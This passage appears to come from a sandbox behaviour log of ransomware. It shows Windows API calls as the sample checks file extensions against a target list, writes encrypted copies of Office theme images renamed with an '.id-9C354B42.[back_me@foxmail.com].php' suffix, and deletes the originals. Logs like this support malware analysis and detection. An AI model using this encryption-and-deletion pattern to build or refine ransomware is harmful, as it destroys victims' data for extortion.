lpString2=".PNG") returned -1 [0047.562] lstrlenW (lpString=".xls") returned 4 [0047.562] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.562] lstrlenW (lpString=".xlsx") returned 5 [0047.562] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.562] lstrlenW (lpString=".ppt") returned 4 [0047.562] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.562] lstrlenW (lpString=".zip") returned 4 [0047.562] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.562] lstrlenW (lpString=".rar") returned 4 [0047.562] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.562] lstrlenW (lpString=".bz2") returned 4 [0047.562] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.562] lstrlenW (lpString=".7z") returned 3 [0047.562] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.563] lstrlenW (lpString=".dbf") returned 4 [0047.563] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.563] lstrlenW (lpString=".1cd") returned 4 [0047.563] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.563] lstrlenW (lpString=".jpg") returned 4 [0047.563] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.563] lstrlenW (lpString=".doc") returned 4 [0047.563] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.563] lstrlenW (lpString=".docx") returned 5 [0047.563] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.563] lstrlenW (lpString=".pdf") returned 4 [0047.563] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.563] lstrlenW (lpString=".xls") returned 4 [0047.563] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.563] lstrlenW (lpString=".xlsx") returned 5 [0047.563] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.563] lstrlenW (lpString=".ppt") returned 4 [0047.563] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.563] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.563] lstrlenW (lpString=".zip") returned 4 [0047.563] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.563] lstrlenW (lpString=".rar") returned 4 [0047.563] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.563] lstrlenW (lpString=".bz2") returned 4 [0047.563] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.563] lstrlenW (lpString=".7z") returned 3 [0047.563] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.564] lstrlenW (lpString=".dbf") returned 4 [0047.564] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.564] lstrlenW (lpString=".1cd") returned 4 [0047.564] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0047.564] lstrlenW (lpString=".jpg") returned 4 [0047.564] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.564] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.564] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.666] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=48115) returned 1 [0047.666] CloseHandle (hObject=0x200) returned 1 [0047.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 0x20 [0047.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.666] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.666] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.676] GetLastError () returned 0x0 [0047.676] ReadFile (in: hFile=0x200, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xbbf3, lpOverlapped=0x0) returned 1 [0047.726] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xbc00, lpOverlapped=0x0) returned 1 [0047.727] ReadFile (in: hFile=0x200, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.727] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.727] SetEndOfFile (hFile=0x20c) returned 1 [0047.728] CloseHandle (hObject=0x20c) returned 1 [0047.728] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.728] SetEndOfFile (hFile=0x200) returned 1 [0047.729] CloseHandle (hObject=0x200) returned 1 [0047.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.729] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1 [0047.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.729] lstrlenW (lpString=".doc") returned 4 [0047.729] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString=".docx") returned 5 [0047.730] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.730] lstrlenW (lpString=".pdf") returned 4 [0047.730] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString=".xls") returned 4 [0047.730] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.730] lstrlenW (lpString=".xlsx") returned 5 [0047.730] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.730] lstrlenW (lpString=".ppt") returned 4 [0047.730] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.730] lstrlenW (lpString=".zip") returned 4 [0047.730] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.730] lstrlenW (lpString=".rar") returned 4 [0047.730] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.730] lstrlenW (lpString=".bz2") returned 4 [0047.730] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString=".7z") returned 3 [0047.730] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.730] lstrlenW (lpString=".dbf") returned 4 [0047.730] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.730] lstrlenW (lpString=".1cd") returned 4 [0047.730] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.730] lstrlenW (lpString=".jpg") returned 4 [0047.730] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.730] lstrlenW (lpString=".doc") returned 4 [0047.730] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.730] lstrlenW (lpString=".docx") returned 5 [0047.731] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.731] lstrlenW (lpString=".pdf") returned 4 [0047.731] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.731] lstrlenW (lpString=".xls") returned 4 [0047.731] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.731] lstrlenW (lpString=".xlsx") returned 5 [0047.731] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.731] lstrlenW (lpString=".ppt") returned 4 [0047.731] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.731] lstrlenW (lpString=".zip") returned 4 [0047.731] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.731] lstrlenW (lpString=".rar") returned 4 [0047.731] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.731] lstrlenW (lpString=".bz2") returned 4 [0047.731] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.731] lstrlenW (lpString=".7z") returned 3 [0047.731] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.731] lstrlenW (lpString=".dbf") returned 4 [0047.731] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.731] lstrlenW (lpString=".1cd") returned 4 [0047.731] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.731] lstrlenW (lpString=".jpg") returned 4 [0047.731] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.731] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.731] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.736] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1593) returned 1 [0047.736] CloseHandle (hObject=0x200) returned 1 [0047.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 0x20 [0047.737] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.737] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.737] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.743] GetLastError () returned 0x0 [0047.743] ReadFile (in: hFile=0x200, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x639, lpOverlapped=0x0) returned 1 [0047.775] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x640, lpOverlapped=0x0) returned 1 [0047.776] ReadFile (in: hFile=0x200, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.776] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.776] SetEndOfFile (hFile=0x20c) returned 1 [0047.777] CloseHandle (hObject=0x20c) returned 1 [0047.779] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.779] SetEndOfFile (hFile=0x200) returned 1 [0047.780] CloseHandle (hObject=0x200) returned 1 [0047.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.780] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 1 [0047.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.780] lstrlenW (lpString=".doc") returned 4 [0047.781] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.781] lstrlenW (lpString=".docx") returned 5 [0047.781] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.781] lstrlenW (lpString=".pdf") returned 4 [0047.781] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.781] lstrlenW (lpString=".xls") returned 4 [0047.781] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.781] lstrlenW (lpString=".xlsx") returned 5 [0047.781] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.781] lstrlenW (lpString=".ppt") returned 4 [0047.781] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.781] lstrlenW (lpString=".zip") returned 4 [0047.781] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.781] lstrlenW (lpString=".rar") returned 4 [0047.781] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.781] lstrlenW (lpString=".bz2") returned 4 [0047.781] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.781] lstrlenW (lpString=".7z") returned 3 [0047.781] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.781] lstrlenW (lpString=".dbf") returned 4 [0047.781] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.781] lstrlenW (lpString=".1cd") returned 4 [0047.781] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.781] lstrlenW (lpString=".jpg") returned 4 [0047.781] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.781] lstrlenW (lpString=".doc") returned 4 [0047.781] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.782] lstrlenW (lpString=".docx") returned 5 [0047.782] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.782] lstrlenW (lpString=".pdf") returned 4 [0047.782] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.782] lstrlenW (lpString=".xls") returned 4 [0047.782] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.782] lstrlenW (lpString=".xlsx") returned 5 [0047.782] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.782] lstrlenW (lpString=".ppt") returned 4 [0047.782] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.782] lstrlenW (lpString=".zip") returned 4 [0047.782] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.782] lstrlenW (lpString=".rar") returned 4 [0047.782] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.782] lstrlenW (lpString=".bz2") returned 4 [0047.782] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.782] lstrlenW (lpString=".7z") returned 3 [0047.782] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.782] lstrlenW (lpString=".dbf") returned 4 [0047.782] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.782] lstrlenW (lpString=".1cd") returned 4 [0047.782] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.782] lstrlenW (lpString=".jpg") returned 4 [0047.782] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.782] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.783] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.869] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=21745) returned 1 [0047.869] CloseHandle (hObject=0x1f8) returned 1 [0047.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 0x20 [0047.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.869] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.869] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.870] GetLastError () returned 0x0 [0047.870] ReadFile (in: hFile=0x1f8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x54f1, lpOverlapped=0x0) returned 1 [0047.898] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5500, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5500, lpOverlapped=0x0) returned 1 [0047.900] ReadFile (in: hFile=0x1f8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.900] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.900] SetEndOfFile (hFile=0x20c) returned 1 [0047.900] CloseHandle (hObject=0x20c) returned 1 [0047.900] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.900] SetEndOfFile (hFile=0x1f8) returned 1 [0047.901] CloseHandle (hObject=0x1f8) returned 1 [0047.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.901] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1 [0047.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.901] lstrlenW (lpString=".doc") returned 4 [0047.901] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.901] lstrlenW (lpString=".docx") returned 5 [0047.901] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.902] lstrlenW (lpString=".pdf") returned 4 [0047.902] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.902] lstrlenW (lpString=".xls") returned 4 [0047.902] lstrcmpiW 